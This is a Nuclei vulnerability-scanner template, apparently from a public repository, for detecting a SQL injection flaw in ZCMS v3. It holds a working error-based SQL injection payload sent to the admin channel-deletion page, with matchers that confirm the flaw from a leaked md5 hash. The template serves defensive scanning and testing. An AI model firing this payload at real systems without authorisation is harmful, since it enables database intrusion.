nuclei-templates/vulnerabilities/other/zcms-v3-sqli.yaml

29 lines
624 B
YAML

id: zcms-v3-sqli
info:
name: ZCMS SQL Injection
author: princechaddha
severity: high
reference:
- https://www.anquanke.com/post/id/183241
tags: zcms,sqli
variables:
num: "999999999"
requests:
- method: GET
path:
- "{{BaseURL}}/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5({{num}})%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'"
matchers-condition: and
matchers:
- type: word
words:
- '{{md5({{num}})}}'
part: body
- type: status
status:
- 200